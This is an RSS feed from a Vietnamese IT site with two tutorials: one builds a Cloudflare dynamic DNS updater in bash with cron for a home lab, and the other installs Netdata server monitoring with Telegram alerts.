<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>configure &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/configure/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Wed, 19 Nov 2025 15:38:44 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>configure &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to configure dynamic IP as static IP with Cloudflare to do Lab at home</title>
		<link>https://en.anonyviet.com/how-to-configure-dynamic-ip-as-static-ip-with-cloudflare-to-do-lab-at-home/</link>
					<comments>https://en.anonyviet.com/how-to-configure-dynamic-ip-as-static-ip-with-cloudflare-to-do-lab-at-home/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Wed, 19 Nov 2025 15:38:44 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[Cloudflare]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[Dynamic]]></category>
		<category><![CDATA[home]]></category>
		<category><![CDATA[Lab]]></category>
		<category><![CDATA[Static]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=20770</guid>

					<description><![CDATA[Nowadays, building a Lab Network at home to run NAS, storage server, self-hosting service&#8230; has become much more popular. A common problem is: how to access network services at home from outside the Internet when most home connections are used? Dynamic IPevery time the modem restarts, the IP changes. Join the channel Telegram belong to [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Nowadays, building a Lab Network at home to run NAS, storage server, self-hosting service&#8230; has become much more popular. A common problem is: how to access network services at home from outside the Internet when most home connections are used? <strong>Dynamic IP</strong>every time the modem restarts, the IP changes.</p>
<div align="center">
<table class="aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"> <span style="font-size: 12pt;"> <strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" target="_blank" class="local-link">Link</a></span>  👈</strong> </span> </td>
</tr>
</tbody>
</table>
</div>
<p>Instead of having to remember a hard-to-remember and ever-changing IP range, the most convenient way is to use <strong>domain name</strong> (For example: <code>lab.anonyviet.com</code>) and configure so that the DNS record is always automatically updated according to the modem&#8217;s current public IP. This article guides you through configuration <strong>Cloudflare + a small bash script</strong> to do Dynamic DNS, helping your domain name always point to the correct IP at home.</p>
<h2 id="ftoc-1-mo-hinh-hoat-dong" class="ftwp-heading">1. Operating model</h2>
<p><img post-id="20770" fifu-featured="1" fetchpriority="high" decoding="async" class="aligncenter wp-image-96429 size-full" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-18-35.png" alt="How to configure dynamic IP as static IP with Cloudflare to do Lab at home" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home" width="600" height="335" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 12" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-18-35.png 600w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-18-35-300x168.png 300w" sizes="(max-width: 600px) 100vw, 600px"/></p>
<p>The idea is as follows:</p>
<ul>
<li>You have a domain name managed by Cloudflare.</li>
<li>On an always-on machine on your local network (Linux, virtual machine, Raspberry Pi…), you run a script periodically.</li>
<li>This script:
<ul>
<li>Get the current public IP (modem&#8217;s WAN IP).</li>
<li>Compare with the IP configured in the A record on Cloudflare.</li>
<li>If changed, the script calls the Cloudflare API to update the IP of your DNS record.</li>
</ul>
</li>
</ul>
<p>Thanks to that, even if the WAN IP changes, it only takes a few minutes for the domain name to automatically point to the new IP, you just need to access the domain as usual.</p>
<h2 id="ftoc-2-chuan-bi-truoc-tren-cloudflare" class="ftwp-heading">2. Prepare in advance on Cloudflare</h2>
<p>Before touching the script, you need to prepare a few things on Cloudflare.</p>
<h3 id="ftoc-2-1-ten-mien-va-cau-hinh-dns" class="ftwp-heading">2.1. Domain name and DNS configuration</h3>
<p>Step 1: Buy and point the domain name to Cloudflare (change the nameserver at the place of purchase to Cloudflare&#8217;s nameserver).</p>
<p>Step 2: In Cloudflare, go to section <strong>DNS</strong> and create an A record for Lab.</p>
<p>Example you want to use: <code>lab.anonyviet.com</code></p>
<p>Create record:</p>
<p><strong>Type</strong>: A</p>
<ul>
<li style="list-style-type: none;">
<ul>
<li style="list-style-type: none;">
<ul>
<li><strong>Name</strong>: <code>lab</code></li>
<li><strong>IPv4 addresses</strong>: can be temporarily filled in <code>123.123.123.123</code> (Then the script will automatically update the real IP).</li>
<li><strong>Proxy status</strong>: depending on needs, can be turned on (Proxied) or turned off (DNS only).</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><img decoding="async" class="aligncenter size-full wp-image-96426" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-06-59.png" alt="create record A cloudflare" width="600" height="180" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 13" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-06-59.png 600w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-06-59-300x90.png 300w" sizes="(max-width: 600px) 100vw, 600px"/></p>
<h3 id="ftoc-2-2-lay-zone-id-va-tao-api-token" class="ftwp-heading">2.2. Get Zone ID and generate API Token</h3>
<p>You need 2 things to automatically configure Cloudflare</p>
<ol>
<li>Zone ID</li>
<li>API Tokens</li>
</ol>
<h4 id="ftoc-cach-lay-zone-id-cloudflare" class="ftwp-heading">How to get Zone ID cloudflare</h4>
<p><strong>Zone ID</strong> of domain (go to domain in Cloudflare, tab <strong>Overview</strong>at the bottom of the page you will see Zone ID).</p>
<p><img decoding="async" class="aligncenter size-full wp-image-96423" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-09-57-03.png" alt="get zone id cloudflare" width="600" height="297" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 14" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-09-57-03.png 600w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-09-57-03-300x149.png 300w" sizes="(max-width: 600px) 100vw, 600px"/></p>
<p>Save the Zone ID number sequence</p>
<h4 id="ftoc-cach-lay-api-toklen-cloudflare" class="ftwp-heading">How to get Cloudflare Toklen API</h4>
<p>Here&#8217;s how to create an API Token with DNS management rights: Go to the page <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fdash.cloudflare.com%2Fprofile%2Fapi-tokens" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">https://dash.cloudflare.com/profile/api-tokens</a></p>
<p>Select <strong>Create Tokens</strong>.</p>
<p>Select template <strong>Edit Zone DNS -> Use template</strong></p>
<p><strong><img decoding="async" class="aligncenter size-full wp-image-96424" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-00-59.png" alt="Edit zone dns" width="600" height="335" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 15" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-00-59.png 600w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-00-59-300x168.png 300w" sizes="(max-width: 600px) 100vw, 600px"/></strong></p>
<p>In Zone Resources, select specific zone, in the box next to select the correct domain you want to update dynamic IP<br /><strong><img decoding="async" class="aligncenter size-full wp-image-96425" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-02-39.png" alt="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 3" width="412" height="400" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 16" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-02-39.png 412w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-02-39-300x291.png 300w" sizes="(max-width: 412px) 100vw, 412px"/></strong></p>
<p>Once created, copy it <strong>API Tokens</strong> and save it in a safe place.</p>
<h2 id="ftoc-3-chuan-bi-may-chay-script-linux-raspberry-pi" class="ftwp-heading">3. Prepare the machine to run the script (Linux / Raspberry Pi)</h2>
<p>You need an always-on machine on your local network, for example:</p>
<ul>
<li>Raspberry Pi.</li>
<li>The server runs Ubuntu, Debian, or any Linux distro.</li>
<li>There is SSH access for configuration.</li>
</ul>
<p>Install additional necessary tools:</p>
<pre><code class="language-bash">sudo apt update&#13;
sudo apt install -y curl jq&#13;
</code></pre>
<p><code>curl</code>  used to call API, <code>jq</code> used to process JSON returned from Cloudflare.</p>
<h2 id="ftoc-4-viet-script-cap-nhat-ip-qua-cloudflare" class="ftwp-heading">4. Write a script to update IP via Cloudflare</h2>
<p>Create folder and script file:</p>
<pre><code class="language-bash">cd ~&#13;
mkdir -p cloudflare&#13;
cd cloudflare&#13;
nano cloudflare.sh&#13;
</code></pre>
<p>Paste the following content (customize the variables at the top of the file accordingly):</p>
<pre><code class="language-bash">#!/usr/bin/env bash&#13;
&#13;
# ================== CẤU HÌNH ==================&#13;
CF_API_TOKEN="YOUR_API_TOKEN_HERE"&#13;
CF_ZONE_ID="YOUR_ZONE_ID_HERE"&#13;
CF_RECORD_NAME="lab.anonyviet.com"   # Tên đầy đủ của record (FQDN)&#13;
&#13;
IP_FILE="$HOME/cloudflare/current_ip.txt"&#13;
LOG_FILE="$HOME/cloudflare/cloudflare.log"&#13;
&#13;
# ================== HÀM HỖ TRỢ ==================&#13;
&#13;
log() {&#13;
  echo "$(date '+%Y-%m-%d %H:%M:%S') - $1" &gt;&gt; "$LOG_FILE"&#13;
}&#13;
&#13;
mkdir -p "$(dirname "$IP_FILE")"&#13;
&#13;
# ================== LẤY IP PUBLIC ==================&#13;
&#13;
CURRENT_IP=$(curl -s https://ipv4.icanhazip.com | tr -d '\n')&#13;
&#13;
if [[ -z "$CURRENT_IP" ]]; then&#13;
  log "Không lấy được IP public, dừng."&#13;
  exit 1&#13;
fi&#13;
&#13;
OLD_IP=""&#13;
if [[ -f "$IP_FILE" ]]; then&#13;
  OLD_IP=$(cat "$IP_FILE")&#13;
fi&#13;
&#13;
if [[ "$CURRENT_IP" == "$OLD_IP" ]]; then&#13;
  log "IP không thay đổi ($CURRENT_IP), bỏ qua cập nhật."&#13;
  exit 0&#13;
fi&#13;
&#13;
log "IP thay đổi: $OLD_IP -&gt; $CURRENT_IP, bắt đầu cập nhật Cloudflare."&#13;
&#13;
# ================== LẤY RECORD ID ==================&#13;
&#13;
RESPONSE=$(curl -s -X GET \&#13;
  "https://api.cloudflare.com/client/v4/zones/$CF_ZONE_ID/dns_records?type=A&amp;name=$CF_RECORD_NAME" \&#13;
  -H "Authorization: Bearer $CF_API_TOKEN" \&#13;
  -H "Content-Type: application/json")&#13;
&#13;
RECORD_ID=$(echo "$RESPONSE" | jq -r '.result[0].id')&#13;
&#13;
if [[ -z "$RECORD_ID" || "$RECORD_ID" == "null" ]]; then&#13;
  log "Không tìm thấy DNS record cho $CF_RECORD_NAME"&#13;
  exit 1&#13;
fi&#13;
&#13;
# ================== GỬI YÊU CẦU CẬP NHẬT ==================&#13;
&#13;
UPDATE_PAYLOAD=$(jq -n \&#13;
  --arg type "A" \&#13;
  --arg name "$CF_RECORD_NAME" \&#13;
  --arg content "$CURRENT_IP" \&#13;
  --argjson ttl 120 \&#13;
  --argjson proxied true \&#13;
  '{type: $type, name: $name, content: $content, ttl: $ttl, proxied: $proxied}')&#13;
&#13;
UPDATE_RESP=$(curl -s -X PUT \&#13;
  "https://api.cloudflare.com/client/v4/zones/$CF_ZONE_ID/dns_records/$RECORD_ID" \&#13;
  -H "Authorization: Bearer $CF_API_TOKEN" \&#13;
  -H "Content-Type: application/json" \&#13;
  --data "$UPDATE_PAYLOAD")&#13;
&#13;
SUCCESS=$(echo "$UPDATE_RESP" | jq -r '.success')&#13;
&#13;
if [[ "$SUCCESS" == "true" ]]; then&#13;
  echo "$CURRENT_IP" &gt; "$IP_FILE"&#13;
  log "Cập nhật thành công bản ghi $CF_RECORD_NAME -&gt; $CURRENT_IP"&#13;
  exit 0&#13;
else&#13;
  log "Cập nhật thất bại. Phản hồi: $UPDATE_RESP"&#13;
  exit 1&#13;
fi&#13;
</code></pre>
<p>Save the file, then grant execution permission:</p>
<pre><code class="language-bash">chmod +x ~/cloudflare/cloudflare.sh&#13;
</code></pre>
<p><strong>Note:</strong></p>
<ul>
<li>Replace <code>YOUR_API_TOKEN_HERE</code> with your real API Token.</li>
<li>Replace <code>YOUR_ZONE_ID_HERE</code> with real Zone ID.</li>
<li>Replace <code>lab.anonyviet.com</code> with the domain/subdomain you want to use for homelab.</li>
</ul>
<h2 id="ftoc-5-chay-thu-script-lan-dau" class="ftwp-heading">5. Test the script for the first time</h2>
<p>Test run manually:</p>
<pre><code class="language-bash">./cloudflare.sh&#13;
</code></pre>
<p>If everything is ok:</p>
<ul>
<li>File <code>current_ip.txt</code> will be created and contain the current public IP.</li>
<li>File <code>cloudflare.log</code> will record the update log.</li>
<li>In Cloudflare → DNS, A record <code>lab.anonyviet.com</code> will be updated with the correct public IP.</li>
</ul>
<p>If you don&#8217;t see updates:</p>
<ul>
<li>Check the correct Zone ID, API Token, and record name.</li>
<li>Use the following command to view log:</li>
</ul>
<pre><code class="language-bash">tail -n 50 ~/cloudflare/cloudflare.log&#13;
</code></pre>
<h2 id="ftoc-6-thiet-lap-cron-de-cap-nhat-tu-dong" class="ftwp-heading">6. Set up cron for automatic updates</h2>
<p>When the script is working well, you should run it automatically every few minutes <code>cron</code>.</p>
<p>Open crontab:</p>
<pre><code class="language-bash">crontab -e&#13;
</code></pre>
<p>Add line:</p>
<pre><code class="language-bash">*/5 * * * * /bin/bash /home/USERNAME/cloudflare/cloudflare.sh &gt;/dev/null 2&gt;&amp;1&#13;
</code></pre>
<p>In there:</p>
<ul>
<li>Replace <code>USERNAME</code> with real username on the system.</li>
<li>Calendar <code>*/5 * * * *</code> meaning run every 5 minutes. You can adjust it to 10, 15 minutes depending on your needs.</li>
</ul>
<p>Press the keys repeatedly to save:</p>
<p><code>Ctrl X </code></p>
<p><code>Y </code></p>
<p><code>Enter</code></p>
<p>From now on, cron will automatically run the script. Every time the WAN IP changes, Cloudflare will be updated a few minutes later.</p>
<h2 id="ftoc-7-nat-port-dich-vu-ra-internet" class="ftwp-heading">7. NAT Port service to the Internet</h2>
<p>Now go to the Internet Router to Nat Port the service out to the Internet, then access the service according to the domain name configured above.</p>
<p>For example, if you want to SSH to the Server at home, then NAT Port 22. Then declare access when outside the internet as: hostname: <strong>lab.anonyviet.com</strong>Port 22.</p>
<p>The picture below is the NAT Port on Modem VNPT GW040-NS</p>
<p><img decoding="async" class="aligncenter wp-image-96427 size-full" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-16-10.png" alt="NAT Port on Modem VNPT GW040-NS" width="600" height="270" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 17" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-16-10.png 600w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-16-10-300x135.png 300w" sizes="(max-width: 600px) 100vw, 600px"/></p>
<p>Use MobaxTerm to remotely SSH to the Lab at home</p>
<p><img decoding="async" class="aligncenter wp-image-96428 size-full" src="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-17-59.png" alt="Use MobaxTerm to remotely SSH to the Lab at home" width="1008" height="373" title="How to configure dynamic IP as static IP with Cloudflare to do Lab at home 18" srcset="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-17-59.png 1008w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-17-59-300x111.png 300w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-17-59-768x284.png 768w, https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-17-59-750x278.png 750w" sizes="(max-width: 1008px) 100vw, 1008px"/></p>
<h2 id="ftoc-8-mot-vai-luu-y-khi-dung-cho-homelab" class="ftwp-heading">8. A few notes when using for homelab</h2>
<ul>
<li>The script should be placed on the computer <strong>always on</strong> in the internal network (Raspberry Pi, mini PC, NAS&#8230;).</li>
<li>You should check the log periodically to make sure the update is not corrupted due to expired tokens, wrong permissions, etc</li>
<li>If you use additional reverse proxy (Nginx Proxy Manager, Traefik&#8230;) or SSL, make sure the domain name points to the correct IP before configuring HTTPS.</li>
</ul>
<p>You can edit the domain name, link, screenshots&#8230; in the article to suit your homelab and system.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/how-to-configure-dynamic-ip-as-static-ip-with-cloudflare-to-do-lab-at-home/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2025/11/19-11-2025-10-18-35.png" medium="image"></media:content>
            	</item>
		<item>
		<title>How to configure Netdata to monitor Server performance</title>
		<link>https://en.anonyviet.com/how-to-configure-netdata-to-monitor-server-performance/</link>
					<comments>https://en.anonyviet.com/how-to-configure-netdata-to-monitor-server-performance/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 18 Apr 2023 01:27:53 +0000</pubDate>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[configure]]></category>
		<category><![CDATA[Monitor]]></category>
		<category><![CDATA[Netdata]]></category>
		<category><![CDATA[Performance]]></category>
		<category><![CDATA[Server]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=12124</guid>

					<description><![CDATA[Netdata is a free system analysis and performance monitoring service. Netdata is designed to provide users with real-time insights into server, application, and service performance, helping you quickly detect, resolve issues, and optimize Server. Join the channel Telegram belong to AnonyViet ???? Link ???? Netdata Cloud highlights: Real-time monitoring: Netdata provides data on system performance [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>Netdata is a free system analysis and performance monitoring service.  Netdata is designed to provide users with real-time insights into server, application, and service performance, helping you quickly detect, resolve issues, and optimize Server.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet </span> ???? <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  ????</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-diem-noi-bat-cua-netdata-cloud" class="ftwp-heading">Netdata Cloud highlights:</h2>
<ol>
<li>Real-time monitoring: Netdata provides data on system performance with the lowest latency, helping users to grasp system health in real time.</li>
<li>Data visualization: Netdata uses intuitive and easy-to-understand graphs to present information about system performance, making it easy for users to analyze data.</li>
<li>Alerts and Notifications: Netdata supports alerts based on CPU, RAM, Network thresholds and abnormal behavior, helping users quickly detect potential problems in the system.</li>
<li>Integration with other tools: Netdata supports sending notifications when the Server has problems by ways such as email, discord, telegram&#8230;</li>
<li>Manage multiple systems: Netdata Cloud allows users to monitor and manage multiple server systems and applications from a single interface, making it easy for them to manage complex environments.</li>
<li>Flexible programming languages: Netdata is written in C, Python, and Go, supports many other programming languages, allowing users to customize and extend easily.</li>
<li>Strong Community: Netdata is an open source project with a large community of developers and users, providing constant support and updates.</li>
</ol>
<h2 id="ftoc-cach-cai-dat-netdata-giam-sat-hieu-suat-server" class="ftwp-heading">How to install Netdata to monitor Server performance</h2>
<p>To install Netdata Server performance monitoring, you need to first register an account at <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.netdata.cloud%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Netdata</a>.  After logging in, choose <strong>Connect Node</strong>.</p>
<figure id="attachment_46318" aria-describedby="caption-attachment-46318" style="width: 694px" class="wp-caption aligncenter"><img decoding="async" class="size-full wp-image-46318" src="https://anonyviet.com/wp-content/uploads/2023/04/connect-node-netdata.png" alt="connect node netdata" width="694" height="304" srcset="https://anonyviet.com/wp-content/uploads/2023/04/connect-node-netdata.png 694w, https://anonyviet.com/wp-content/uploads/2023/04/connect-node-netdata-300x131.png 300w" sizes="(max-width: 694px) 100vw, 694px" title="How to configure Netdata to monitor Server 12 . performance"/><figcaption id="caption-attachment-46318" class="wp-caption-text">connect node netdata</figcaption></figure>
<p>You can install Netdata on your server using wget, curl or docker…</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-46319" src="https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-netdata.png" alt="netdata image" width="794" height="688" title="How to configure Netdata to monitor Server 13 . performance"/></p>
<p>I will choose to use wget for quick, copy the command below and paste it in Terminal on your Server.  Everything will happen automatically.</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-46320" src="https://anonyviet.com/wp-content/uploads/2023/04/cach-su-dung-netdata-de-theo-doi-server.png" alt="How to use netdata by server" width="807" height="345" srcset="https://anonyviet.com/wp-content/uploads/2023/04/cach-su-dung-netdata-de-theo-doi-server.png 807w, https://anonyviet.com/wp-content/uploads/2023/04/cach-su-dung-netdata-de-theo-doi-server-300x128.png 300w, https://anonyviet.com/wp-content/uploads/2023/04/cach-su-dung-netdata-de-theo-doi-server-768x328.png 768w, https://anonyviet.com/wp-content/uploads/2023/04/cach-su-dung-netdata-de-theo-doi-server-750x321.png 750w" sizes="auto, (max-width: 807px) 100vw, 807px" title="How to configure Netdata to monitor Server 14 . performance"/></p>
<p>During the installation process, if a message appears, press <code>y</code> and <strong>Enter</strong> to continue.</p>
<p>After the installation is complete, go back to Netdata&#8217;s Web site, select <strong>All Nodes</strong> and select the table <strong>Nodes</strong>tap the number <strong>first</strong> to see the performance of the Server you just installed.</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-46321" src="https://anonyviet.com/wp-content/uploads/2023/04/xem-nodes-trong-netdata-cloud.png" alt="view nodes in netdata cloud" width="909" height="452" srcset="https://anonyviet.com/wp-content/uploads/2023/04/xem-nodes-trong-netdata-cloud.png 909w, https://anonyviet.com/wp-content/uploads/2023/04/xem-nodes-trong-netdata-cloud-300x149.png 300w, https://anonyviet.com/wp-content/uploads/2023/04/xem-nodes-trong-netdata-cloud-768x382.png 768w, https://anonyviet.com/wp-content/uploads/2023/04/xem-nodes-trong-netdata-cloud-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2023/04/xem-nodes-trong-netdata-cloud-750x373.png 750w" sizes="auto, (max-width: 909px) 100vw, 909px" title="How to configure Netdata to monitor Server 15 . performance"/></p>
<p>Wait about 1 minute for the Server to push CPU, RAM, Network data, hard drive read and write speed &#8230; to Netdata, you will see a very professional chart.</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-46322" src="https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata.png" alt="View information from netdata" width="1490" height="271" srcset="https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata.png 1490w, https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata-300x55.png 300w, https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata-1024x186.png 1024w, https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata-768x140.png 768w, https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata-750x136.png 750w, https://anonyviet.com/wp-content/uploads/2023/04/xem-thong-so-bieu-do-netdata-1140x207.png 1140w" sizes="auto, (max-width: 1490px) 100vw, 1490px" title="How to configure Netdata to monitor Server 16 . performance"/></p>
<p>So you have installed Netdata to monitor the Server.  Now we will configure Telegram to send notifications.</p>
<h2 id="ftoc-tao-bot-telegram-thong-bao-su-co-server-bang-netdata" class="ftwp-heading">Create a Telegram Bot to report Server problems using Netdata</h2>
<p>By default, Netdata will send an email notification when the Server has a problem, but if you want to notify via Telegram Bot, you can follow these steps:</p>
<p><strong>Step 1:</strong> Enter <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2FBotFather" class="local-link" rel="noopener">https://t.me/BotFather</a> type command <code>/newbot</code> to create a new Bot (see details on how to create a Telegram Bot <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fhuong-dan-tu-tao-bot-chatgpt-tren-telegram%2F%23ftoc-yeu-cau" class="local-link" rel="noopener">here</a>).  Remember to copy the Bot&#8217;s Token after it is created.</p>
<p><strong>Step 2:</strong> Chat with Bot <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fmyidbot" class="local-link" rel="noopener">https://t.me/myidbot</a> type command <code>/getid</code> to see your Telegram ID.  If you want bots to send notifications to the Group, add bots <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fmyidbot" rel="noopener noreferrer" class="local-link">@myidbot</a> Go to Group then type the command <code>/getgroupid</code> to get the Group ID.</p>
<p><strong>Step 3:</strong> At the Server, access the path: <code>/usr/lib/netdata/conf.d/</code>.  Open File <strong>health_alarm_notify.conf</strong>edit the following lines again:</p>
<ul>
<li>Set SEND_TELEGRAM to YES.</li>
<li>Change TELEGRAM_BOT_TOKEN to the Token Bot you got in Step 1</li>
<li>Set DEFAULT_RECIPIENT_TELEGRAM to the Telegram ID you got in Step 2 <em>(if Group ID will have a &#8211; in front)</em></li>
</ul>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-46323" src="https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-telegram-netdata.png" alt="netdata telegram image" width="891" height="275" srcset="https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-telegram-netdata.png 891w, https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-telegram-netdata-300x93.png 300w, https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-telegram-netdata-768x237.png 768w, https://anonyviet.com/wp-content/uploads/2023/04/cau-hinh-telegram-netdata-750x231.png 750w" sizes="auto, (max-width: 891px) 100vw, 891px" title="How to configure Netdata to monitor Server 17 . performance"/></p>
<p>Next, Restart Netdata with the command: <code>service netdata restart</code></p>
<p>To test whether Netdata sends notifications about Telegram, use the command: <code>bash -x /usr/libexec/netdata/plugins.d/alarm-notify.sh test</code></p>
<p>If you see the picture, the configuration is successful:</p>
<p><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-46324" src="https://anonyviet.com/wp-content/uploads/2023/04/netdata-cloud.png" alt="netdata cloud" width="441" height="352" srcset="https://anonyviet.com/wp-content/uploads/2023/04/netdata-cloud.png 441w, https://anonyviet.com/wp-content/uploads/2023/04/netdata-cloud-300x239.png 300w" sizes="auto, (max-width: 441px) 100vw, 441px" title="How to configure Netdata to monitor Server 18 . performance"/></p>
<p>To change the Server&#8217;s HOSTNAME when recognized by Netdata, do the following:</p>
<p>Open file <code>/etc/netdata/netdata.conf</code> Add line: <code>hostname = Tên-Server</code> in the last line.</p>
<p>Next, Restart Netdata with the command: <code>service netdata restart</code> done.</p>
<p>You should combine with <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftao-he-thong-bao-dong-khi-website-gap-su-co-voi-uptime-kuma%2F" class="local-link" rel="noopener">Kuma Uptime</a> to increase the ability to monitor the system better.</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;46317&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;0&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;0&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 0\/5 - (0 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;title&quot;:&quot;C\u00e1ch c\u1ea5u h\u00ecnh Netdata gi\u00e1m s\u00e1t hi\u1ec7u su\u1ea5t Server&quot;,&quot;width&quot;:&quot;0&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} 